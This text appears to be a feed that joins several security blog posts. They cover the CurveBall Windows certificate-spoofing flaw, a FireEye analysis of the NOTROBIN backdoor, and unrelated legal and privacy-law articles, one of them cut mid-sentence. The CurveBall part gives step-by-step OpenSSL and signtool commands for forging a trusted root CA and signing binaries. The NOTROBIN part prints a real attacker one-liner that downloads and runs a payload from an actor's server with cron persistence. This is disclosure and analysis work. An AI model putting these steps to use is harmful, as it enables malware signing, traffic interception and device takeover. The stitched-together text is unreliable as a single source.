To minimize effort, an important initial step is to find the right level of abstraction and the details we need to care about. The minimal details released about the bug refer to the public key and curve parameters, and nothing about specific signature details, so reading about how to generate a public/private key pair in Elliptic Curve (EC) cryptography and how to define a curve should be enough.

The first part of this Wikipedia article defines most of what we need to know. There’s a point G that’s on the curve and is used to generate another point. To create a pair of public/private keys, we take a random number k (the private key) and multiply it by G to get the public key (Q). So, we have Q = k*G. How this works doesn’t really matter for this purpose, so long as the scalar multiplication behaves as we’d expect. The idea here is that knowing Q and G, it’s hard to recover k, but knowing k and G, it’s very easy to compute Q.

Rephrasing this in the perspective of the bug, we want to find a new k’ (a new private key) with different parameters (a new curve, or maybe a new G) so that the ECC math gives the same Q back. The easiest solution is to consider a new generator G’ that is equal to our target public key (G’= Q). This way, with k’=1 (a private key equal to 1) we get k’G’ = Q which would satisfy the constraints (finding a new private key and keeping the same public key).
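
Written out in the same notation, the trick (and its slightly more general form) looks like this. This is only an illustration of the reasoning above, not additional material from the advisory:

Legitimate CA:    Q = k * G                       (standard curve, generator G, secret private key k)
Spoofed params:   G' = Q, k' = 1            =>    k' * G' = 1 * Q = Q
More generally:   pick any k', set G' = (k'^-1 mod n) * Q    =>    k' * G' = Q

Here n is the order of the generator; any k' works as long as G' is set to the modular inverse of k' times Q, and k' = 1 is simply the easiest case to construct.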

The next step is to verify if we can actually specify a custom G’ while specifying the curve we want to use. Microsoft’s documentation is not especially clear about these details, but OpenSSL, one of the most common cryptography libraries, has a page describing how to generate EC key pairs and certificates. The following command shows the standard parameters of the P384 curve, the one used by the Microsoft ECC Root CA.

Elliptic Curve Parameter Values
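
The output shown above can be reproduced with OpenSSL’s ecparam command; a command along these lines prints the explicit P384 (secp384r1) parameters, including the generator (the exact output layout varies by OpenSSL version):

# Print the P-384 domain parameters in explicit form (prime, A, B, Generator, Order, Cofactor)
openssl ecparam -name secp384r1 -param_enc explicit -text -noout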

We can see that one of the parameters is the Generator, so it seems possible to modify it.

Now we need to create a new key pair with explicit parameters (so all the parameters are contained in the key file, rather than just embedding the standard name of the curve) and modify them following our hypothesis. We replace the generator G’ with the Q from the Microsoft certificate, we replace the private key k’ with 1, and lastly, we replace the public key Q’ of the certificate we just generated with the Q of the Microsoft certificate.
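
A rough sketch of that key-generation step is shown below; the file name is ours, and the subsequent swaps of the generator, private key, and public key were done by hand on the decoded key material rather than by any single command:

# Generate a P-384 key pair with the curve parameters written out explicitly in the key file
openssl ecparam -name secp384r1 -genkey -param_enc explicit -noout -out spoofed_ca.key

# Dump the key so the private key, public key, and Generator fields are visible for editing
openssl ec -in spoofed_ca.key -text -noout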

To make sure our modification is functional, and the modified key is a valid one, we use OpenSSL to sign a text file and successfully verify its signature.

Signing a text file and verifying the signature using the modified key pair (k’=1, G’=Q, Q’=Q)
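
The round trip shown in the figure can be reproduced with commands similar to the following (file names are placeholders of ours):

# Derive the public key from the modified key pair
openssl ec -in spoofed_ca.key -pubout -out spoofed_ca.pub

# Sign a text file with the modified private key, then verify the signature with the public key
openssl dgst -sha256 -sign spoofed_ca.key -out test.sig test.txt
openssl dgst -sha256 -verify spoofed_ca.pub -signature test.sig test.txt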

From there, we followed a couple of tutorials to create a signing certificate using OpenSSL and signed custom binaries with signtool. Eventually we were greeted with an executable that appeared to be signed with a valid certificate!
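
For completeness, a heavily abbreviated sketch of those packaging steps is shown below. The subject name, file names, and password are placeholders of ours, generation of the leaf key and CSR is not shown, and the tutorials we actually followed differed in the details (a real code-signing certificate also needs the codeSigning extended key usage):

# Self-sign the spoofed root CA certificate with the modified key pair
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt -days 365 -subj "/CN=Spoofed ECC Root CA"

# Issue a leaf code-signing certificate under the spoofed CA
openssl x509 -req -in codesign.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out codesign.crt -days 365

# Bundle the leaf certificate, its key, and the CA into a PFX, then sign the target binary on Windows
openssl pkcs12 -export -out codesign.pfx -inkey codesign.key -in codesign.crt -certfile spoofed_ca.crt -passout pass:test
signtool sign /fd SHA256 /f codesign.pfx /p test target.exe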

Spoofed/Forged Certificate Seemingly Signed by Microsoft ECC Root CA

Using Sysinternals’ Sigcheck (sigcheck64.exe) along with Rohitab’s API Monitor (which, ironically, is hosted on a site not using HTTPS) on an unpatched system with our PoC, we can clearly see the vulnerability in action in the return values of these functions.

Rohitab API Monitor – API Calls for Certificate Verification

Industry-wide vulnerabilities seem to be gaining critical mass and increasing visibility even to non-technical users. And, for once, the “cute” name for the vulnerability showed up relatively late in the process. Visibility is critical to progress, and an understanding and healthy respect for the potential impact are key factors in whether businesses and individuals quickly apply patches and dramatically reduce the threat vector. This is even more essential with a bug that is so easy to exploit, and likely to have an immediate exploitation impact in the wild.

McAfee Response

McAfee aggressively developed updates across its product lines. Specific details can be found here.

The post CurveBall – An Unimaginative Pun but a Devastating Bug appeared first on McAfee Blogs.

What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process

By: Jan Schnellbächer and Martin Stecher, McAfee Germany GmbH

This week security researchers around the world were very busy working on Microsoft’s major crypto-spoofing vulnerability (CVE-2020-0601), otherwise known as Curveball. The majority of research went into attacks with malicious binaries that are signed with a spoofed Certificate Authority (CA) which unpatched Win10 systems would in turn trust. The other attack vector, HTTPS server certificates, got less attention until Saleem Rashid posted a first working PoC on Twitter, followed by Kudelski Security and “Ollypwn”, who published more details on how the proofs of concept are created.

McAfee security experts followed the same approach and were able to reproduce the attack. In addition, they confirmed that users browsing via unpatched Windows systems were protected, provided their clients were deployed behind McAfee’s Web Gateway or Web Gateway Cloud Service with the certificate verification policy running. This is typically part of the SSL Scanner but is also available as a separate policy even if no SSL inspection is performed (see KB92322 for details).

In our first attempt, we used the spoofed version of a CA from the Windows Root CA trust store to sign a server certificate and then provided only the server certificate when the HTTPS connection was being established. That attempt failed, and we assumed that we did not get the spoofing right. Then we learned that the spoofed CA actually needs to be included together with the server certificate, and that this chain of certificates is then accepted by an unpatched Windows 10 system.
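
In web server terms, “including the spoofed CA together with the server certificate” simply means serving the full chain. A minimal, hedged example of preparing such a chain file is shown below (file names are ours; most TLS servers, for instance nginx via ssl_certificate or Apache via SSLCertificateFile, accept a leaf-plus-CA bundle in this form):

# Concatenate the leaf server certificate and the spoofed CA certificate into one chain file
cat server.crt spoofed_ca.crt > fullchain.pem
# The test web server is then configured to present fullchain.pem to connecting clients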

But why is that? Since the spoofed version is the one being sent, it is obviously not the same certificate that exists in the trust store and, one would think, should be denied immediately. Also, in the beginning we tried hard to make the spoofed CA as similar to the original CA as possible (same common name, same serial number, etc.). In fact, we found that none of that plays any role when Windows does the certificate verification.

A good indication of what’s happening behind the scenes is already provided by Windows’ own certificate information dialogs. We started with the “UserTrust ECC Certificate” in the Windows Trusted Root CA catalog, which carries the friendly name “Sectigo ECC”. Then we created a spoofed version of that CA and gave it a new common name, “EVIL CA”. With that, it was easy to set up a new test HTTPS server in our test network and manipulate the routing of a test client so that it would reach our server when the user types https://www.google.com into the browser. The test server presented SSL session information for debugging purposes instead of any Google content.

When you click on the lock symbol, the browser tells you that the connection has been accepted as valid and trusted and that the original “Sectigo ECC” root CA had signed the server certificate.

But we know that this was not the case, and in contrast to our own original assumptions, Windows did not even verify the server certificate against the “Sectigo ECC” certificate. It compared it against the included spoofed CA. That can be seen when you click “View certificates”:

As the screenshot shows, we are still in the same SSL session (the master key is the same on both pictures), but now Windows is showing that the (correct) issuer of the server certificate is our spoofed “EVIL CA”.

Windows’ cryptographic signature verification works correctly

The good news is that Windows does not really have an issue with the cryptographic functions to validate the signature of an elliptic curve certificate! That verification works correctly. The problem is how the trust chain comparison is done to prove that the chain of signatures is correctly ending in the catalog of trusted root CAs.

We had assumed that an attack would use a signing CA that points to an entry in the trusted Root CA store, and that the signature verification would be lax enough to accept a signature made with a spoofed CA rather than the original one. But in fact, Windows validates the embedded certificate chain (which is perfectly valid and cryptographically correct) and then matches the signing certificate with the entries in the trusted Root CA store. This last piece is what was not done correctly prior to the patch.

Our tests revealed that Windows does not even try to match the certificates. It matches only the public key of the certificates, plus a few other fields, making the comparison incomplete. That was the actual bug of this vulnerability (at least as far as web site certificates are concerned).

The Trusted Certificate Store is actually a Trusted Public Key Store

When we talk about the trust chain in SSL/TLS communication, we mean a chain of certificates that are signed by a CA until we reach a trusted Root CA. But Microsoft appears to ignore the certificates for the most part and instead manages a chain of the public keys of certificates. The comparison also takes the algorithm into account. At a time when only RSA certificates were used, that was sufficient: it was not possible for an attacker to create his own key pair with the same public key as the trusted certificate. With the introduction of Elliptic Curve Cryptography (ECC), Microsoft’s comparison of only the algorithm and the public key is no longer enough, because it fails to also compare the characteristics of the elliptic curve itself. Without these additional parameters, an attacker can simply recreate the same public key (curve point) on a different curve. This is what was fixed on Patch Tuesday: the comparison of the public key information now includes the curve characteristics.
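
For reference, a public key alone does not pin a curve point down; the full set of ECC domain parameters has to be part of any comparison. In SEC1 notation (standard terminology, not anything specific to Microsoft’s implementation), the parameters for a prime-field curve are:

T = (p, a, b, G, n, h)

  p     the prime defining the underlying field
  a, b  the coefficients of the curve equation y^2 = x^3 + a*x + b (mod p)
  G     the base point (generator)
  n     the order of G
  h     the cofactor

Prior to the patch, only the algorithm identifier and the public key Q were compared; a complete comparison has to cover both T and Q.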

This screenshot shows that the original certificate on the right side and the spoofed CA on the left are very different: different common name, and a totally different elliptic curve (a standard curve for the original CA and a handcrafted one for the spoofed version), but the public key seen under the “pub” entry is identical. That has been sufficient to make Windows believe that the embedded spoofed CA was the same as the trusted CA in the certificate store.

Why not compare certificates by name or serial number?

A different (and maybe more natural) algorithm would be to compare certificates by their common name and/or their serial number and, whenever there is a match, continue the trust chain and verification with the certificate in the trust store. Why is Windows comparing public keys instead? We can only speculate, but the advantage might be for enterprises that want to swap their certificates without rolling out new root CAs to all client computers. Imagine an organization that maintains its own PKI and installs its own Root CA in the store of trusted certificates. When such a company goes through a merger or acquisition, its name may change, and that would be a good time to also change the common name of the signing certificate. However, if there is no good way to remotely maintain all clients and update the certificate in the trusted store, it is easier to reuse the original key pair and create a new certificate with that same key pair. The new cert will still match the old cert and no client update is necessary. Convenient! But is it secure? At this point it is not really a chain of trusted certificates but a chain of trusted public keys.

We tested whether this could also be misused to create a new cert when the old one has expired, but that is not the case. After comparing the public keys, Windows still uses the expiration date of the certificate in the trusted store to determine whether the chain is valid, which is good.

How to harden the process?

The root problem of this approach is that the complete cryptographic verification happens with the embedded certificates, and only after that verification is the match against the entry in the trusted Root CA store performed. That order always leaves room for oversights and incomplete matching algorithms, as we have seen with this vulnerability. A safer approach is to first match the certificates (or public keys), find the corresponding entry in the trusted Root CA store, and then use that trusted certificate to continue the signature verification. That way, the verification fails on the safe side and broken chains can be identified easily.

We do not know whether that has been changed with the patched Windows version or if only the matching algorithm has been improved. If not, we recommend reviewing this alternative approach and further hardening the implementation in the operating system and browser.

The post What CVE-2020-0601 Teaches Us About Microsoft’s TLS Certificate Verification Process appeared first on McAfee Blogs.

McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability

Microsoft made news this week with the widely reported vulnerability known as CVE-2020-0601, which impacts the Windows CryptoAPI. This highly critical vulnerability allows an attacker to fake both signatures and digital certificates. An attacker could use spoofed Elliptic Curve Cryptography (ECC) certificates to sign malicious files so they evade detection, or to impersonate specific hostnames so browser security alerts are not triggered, making a file or site appear to come from a trusted, legitimate source. The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider. A successful exploit could also allow the attacker to conduct man-in-the-middle attacks and decrypt confidential information on user connections to the affected software.

The CVE-2020-0601 vulnerability reportedly impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. The Microsoft patch (below) addresses the vulnerability by ensuring that Windows CryptoAPI completely validates ECC certificates. 

Since the vulnerability was identified, a public proof-of-concept exploit has been posted that allows a malicious party to sign executables as though they came from a trusted third party. Additionally, the bug could be used to intercept and fake secure web (HTTPS) connections and to fake signatures for files and emails.

Details on McAfee’s enterprise defenses against this vulnerability are outlined below and available in knowledge base article KB92322. Additional products may be updated with extra countermeasures and defenses as our research uncovers more. We will continue to update the articles.

What can you do to protect yourself?

The bug is considered to be highly critical. It is important for everyone running a vulnerable operating system to apply the security update provided by Microsoft.

Large organizations that follow 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible.

Microsoft’s security patches are available here. The event is serious enough that the NSA has released its own security advisory, with mitigation information and guidance on detecting exploitation, urging IT staff to expedite the installation of Microsoft’s security updates. The Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS) has also released an emergency directive to alert the US private sector and government entities about the need to install the latest Windows OS fixes sooner rather than later.

How are McAfee Customers Protected?

McAfee products can help detect and prevent the exploit from executing on your systems.  Specifically:

McAfee Endpoint Security (ENS)

McAfee can help protect against this vulnerability with a signature set designed to detect fraudulently signed files.

Threat Intelligence Exchange (TIE)

TIE can help identify file signing abuse prior to patching by providing a workflow to pivot into spoofed CAs and the binaries they have signed that have already run in the environment.

McAfee Network Security Platform (IPS)

NSP signatures (Emergency Signature set version 10.8.3.3) will prevent file signing abuse by blocking connections that are using certificates known to be impacted by the vulnerability.

McAfee Web Gateway

File inspection for signatures has been implemented in Web Gateway Anti-Malware. Using HTTPS scanning on the Web Gateway moves the validity checks for certificates from endpoints to the gateway and provides a central HTTPS certificate policy that is not based on the vulnerable function.

McAfee MVISION EDR

MVISION EDR can detect exploit attempts for this vulnerability on patched systems. In order to identify devices that have been involved recently in an exploit attempt, the customer can use the Real Time Search dashboard to execute a query using an NSACryptEvents collector.

McAfee Active Response (MAR)

McAfee Active Response has the ability to detect exploit attempts for this vulnerability. To identify devices that have been involved recently in an exploit attempt, the customer can use Active Response Catalog to create a custom collector and Active Response Search to execute a query using that collector. McAfee Active Response (MAR) users can also do a real time query with the NSACryptEvents collector.

McAfee Enterprise Security Manager (SIEM)

McAfee Enterprise Security Manager can detect exploit attempts for this vulnerability on patched systems by detecting events routed to SIEM using new signatures available via the normal content update process. (Refer to the knowledge-base article outlining how to update EMS rules.)

New rules have been uploaded to the content server with new signature ID’s and descriptions for these events. Customers can use these to create alarms.

Full details on how to access these solutions are outlined in knowledge-base article KB92322. Additional products may be updated with further countermeasures and defenses as our research uncovers more. We will continue to update knowledge-base article KB92322 with any additional recommendations or findings.

The post McAfee’s Defenses Against Microsoft’s CryptoAPI Vulnerability appeared first on McAfee Blogs.

What Website Owners Should Know About Terms and Conditions

All website owners should consider terms and conditions (T&Cs) to be a form of legal protection, as they establish the responsibilities and rights of the involved parties. T&Cs provide a layer of legal protection should anything go amiss, and they also help you settle any disputes quickly without having to resort to the courts.

Is it a legal requirement to include T&Cs?
No, but it’s always best to include terms and conditions on your website as they will enable you to reduce your potential liabilities. It is essential that you let your customers or visitors know about their rights; if you’re not clear about your policies, they may dispute matters such as cancellation options, item returns and other rights, putting your company at a disadvantage. Additionally, if areas of your terms and conditions are unclear or not mentioned at all, you may be liable to give your customers additional rights beyond those provided by statute.
Do you have to include GDPR provisions?
Website owners, even those outside the European Union (EU), should also consider incorporating the General Data Protection Regulation. Inserting a data protection clause can reassure your customers that their data will not be used for inappropriate purposes. You can include the majority of the GDPR obligations in your site’s privacy policy.

What should you include in the T&Cs?
If you are an online seller, it is essential to explain to customers the various processes involved, such as:
  • How to make a purchase
  • How to make a payment
  • How they will receive their products
  • How they can cancel orders
T&Cs help you establish boundaries by outlining what specific rights customers have. In return, you also inform them about your obligations as a seller and the limits of your legal liability.

What kind of protection can you expect from the T&Cs? It is not uncommon for disputes to arise between you and your online customers or visitors. Therefore, it is essential to ensure that the terms and conditions are accessible, preferably on your website.

You also need to protect your website from copyright infringements. You can avoid potential disputes and confusion by specifying which sections are copyrighted and which are your intellectual property. You should also stipulate what visitors can do with your data. If there is any breach of your copyright or intellectual property, the terms and conditions should clearly explain how the problem will be resolved.

Are there standard T&Cs which apply to all websites?
There are general formats or templates of T&Cs that you can obtain for free online. However, there is always the possibility that these documents will not cover specific aspects of your business or will not include the relevant terms. If you omit an essential term from your website, you may find yourself vulnerable if a dispute arises. Therefore, it is critical that you customise your terms and conditions so they are suitable for your website and business.
  • Product and service offerings – No two businesses are alike, even if you sell the same products and services. For example, your competitor may only accept PayPal but you may allow other modes of payment.
  • Industry or target audience – In every industry, there are specific provisions that need to be included in the T&Cs. For example, customers may have a legal right to cancel or return their purchases within a specified period.
Can website owners enforce their T&Cs?
Your T&Cs are like any other enforceable contract. Nevertheless, you must ensure that they don’t contravene existing consumer laws or government regulations. Remember, you should only incorporate clauses that you can legally apply.

Conclusion
Terms and conditions are necessary for all businesses, including e-commerce sites. It is essential that you create T&Cs that are suitable for your products and services, and that they are legally enforceable. You also need to periodically review your T&Cs, especially if there have been any significant changes to your business structure or the law. Moreover, they must be accessible to your online customers and visitors. If they are not aware of your T&Cs, you may find it difficult to enforce them if a problem arises.

Written by Kerry Gibbs, a legal expert at BEB Contract and Legal Services.

2020 Trend Alert: Consumer Privacy

We are only a few weeks into 2020, and it is safe to say that consumer privacy is all the rage. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights to their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that, if passed, will affect not only consumers but also the businesses that operate in these states.

Take a look at the bills, then consider the steps your business can take to help comply with the regulations.

California Consumer Privacy Act

The newly established rights allow consumers to request records of what personal data is collected and to demand that businesses delete that information or stop selling it. The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers that choose to exercise their rights.

Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:

  • Gross annual revenue over $25 million
  • Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households
  • Makes over 50 percent of its revenue from selling consumers’ data.

To further empower consumers, the CCPA also requires data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers.

Washington Privacy Act

On January 13, 2020, Washington State Senator Reuven Carlyle introduced the bill for the Washington Privacy Act (WPA), SB 5376. If passed, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt out of targeted advertisements and profiling. Controllers will need to conduct data protection assessments covering where they process personal data, plus additional assessments anytime there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency and establish limits on the use of facial recognition technology.

New Hampshire Privacy Act

New Hampshire State Representatives Garrett Muscatel and Greg Indruk reintroduced the Act Relative to the Collection of Personal Information by Businesses, HB 1680, in the New Hampshire House of Representatives. The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like the CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.

New York Privacy Act

The New York Privacy Act, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protections, and allow consumers to take action over the misuse of their personal data. Personal data will include biometric information and internet or electronic network activity.

What steps can you take to protect your clients and your business?

These regulations, and others like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our Veracode Verified program gives you a clear AppSec roadmap to follow, helping to ensure that security is woven into your development process.

In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.

Contact us today to learn how to better secure your applications to comply with industry standards.

What Is the CurveBall Bug? Here’s What You Need to Know 

Today, it was announced that researchers published proof of concept code (essentially, an exercise to determine if an idea is a reality) that exploits a recently patched vulnerability in the Microsoft Windows operating system (OS). The vulnerability, named CurveBall, impacts the components that handle the encryption and decryption mechanisms in the Windows OS, which inherently help protect sensitive information.

How It Works 

So how does this vulnerability work, exactly? For starters, unsafe sites or files can disguise themselves as legitimate ones.  When this vulnerability is exploited, CurveBall could allow a hacker to launch man-in-the-middle attacks, which is when a hacker secretly relays and possibly alters the communications between two unsuspecting users. Additionally, a hacker could use the vulnerability to intercept and fake secure web (HTTPS) connections or fake signatures for files and emails. Essentially, this means a hacker could place harmful files or run undetected malware on a system.

What It Impacts 

There are still questions surrounding what exactly is impacted by CurveBall, and subsequently what could be affected by the new code. According to Microsoft, CurveBall impacts Windows 10, Windows Server 2019, and Windows Server 2016 OS versions. With three popular operating systems affected, and the possibility of bypassing basic security safeguards, patching is more important than ever. For unpatched systems, malware that takes advantage of this vulnerability may go undetected and slip past security features.

How to Stay Protected 

Now, what should you do to protect yourself from the CurveBall vulnerability? At McAfee, we are in the process of deploying an update to keep our loyal users secure from this vulnerability. In the meantime, however, there are a few things you can do to protect yourself. Start by following these tips:

  • Update your Windows 10 OS to get the latest security patches.
  • Use caution when surfing the web.
  • Only open files and emails from trusted sources.
  • Update your browsers to the latest versions if available.
  • If you are an enterprise customer, please reference KB92329 for information on McAfee enterprise defense from this vulnerability.
  • Contact McAfee Support if you have any further questions or need assistance.

To stay on top of McAfee news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What Is the CurveBall Bug? Here’s What You Need to Know  appeared first on McAfee Blogs.

NIST Releases Version 1.0 of Privacy Framework

Our data-driven society has a tricky balancing act to perform: building innovative products and services that use personal data while still protecting people’s privacy. To help organizations keep this balance, the National Institute of Standards and Technology (NIST) is offering a new tool for managing privacy risk. The agency has just released Version 1.0 of the NIST Privacy Framework: A Tool for Improving Privacy through Enterprise Risk Management. Developed from a draft version in collaboration with a range of stakeholders, the framework provides a useful set of privacy protection

Israeli spyware firm fails to get hacking case dismissed

Judge orders NSO Group to fight case brought by Saudi activist and pay his legal costs

An Israeli judge has rejected an attempt by the spyware firm NSO Group to dismiss a case brought against it by a prominent Saudi activist who alleged that the company’s cyberweapons were used to hack his phone.

The decision could add pressure on the company, which faces multiple accusations that it sold surveillance technology, named Pegasus, to authoritarian regimes and other governments that have allegedly used it to target political activists and journalists.

Continue reading...

I’m still on Windows 7 – what should I do?

Support for Windows 7 has ended, leaving Marcy wondering how they can protect themselves

I do a lot of work on a Windows 7 desktop PC that is about five years old. I’m a widow and can’t afford to run out and get a new PC at this time, or pay for Windows 10. If I do stay with Windows 7, what should I worry about, and how can I protect myself? I have been running Kaspersky Total Security for several years, which has worked well so far. Marcy

Microsoft Windows 7 – launched in 2009 – came to the end of its supported life on Tuesday. Despite Microsoft’s repeated warnings to Windows 7 users, there may still be a couple of hundred million users, many of them in businesses. What should people do next?

Continue reading...

404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation
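
Defenders can hunt for this pattern in their own web logs. The following is only a sketch; the access log location below is an assumption and varies by NetScaler version and logging configuration:

# Search (possibly rotated) HTTP access logs for POSTs that reach the vulnerable CGI script
grep -E 'POST /vpn/\.\./vpns/portal/scripts/newbm\.pl' /var/log/httpaccess.log*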

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works.  In any case, exploitation causes the Bash one liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands include:

  1. Kill and delete all running instances of netscalerd, a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Create a hidden staging directory /tmp/.init, download NOTROBIN into it, and enable the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Manually execute NOTROBIN.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186 that appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after their embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmenting payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution
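
A quick, hedged way to sweep for that indicator is shown below. The syslog path is the usual FreeBSD location and is our assumption for NetScaler; rotated logs may need to be included as well:

# Look for cron executing the NOTROBIN persistence path as the nobody user
grep '/var/nstmp/.nscache/httpd' /var/log/cron*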

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits itself. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.
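
NOTROBIN itself is a compiled Go binary, so the following is only a shell approximation of the template-cleaning routine described above, written to illustrate the matching logic; the key value is the sample one quoted earlier:

KEY="64d4c2d3ee56af4f4ca8171556d50faa"            # per-sample hardcoded key

for f in /netscaler/portal/templates/*.xml; do
    [ -e "$f" ] || continue                       # skip if the glob matched nothing
    case "$f" in *"$KEY"*) continue ;; esac       # files named after the key are left alone
    if grep -q -e 'block' -e 'BLOCK' "$f"; then   # likely staged exploit code
        rm -f "$f"
    fi
done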

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function, main.install_cron, whose implementation has been removed; alternatively, perhaps these are vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a socket listening on UDP 18634.


Figure 7: File handle listing of a compromised NetScaler device
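
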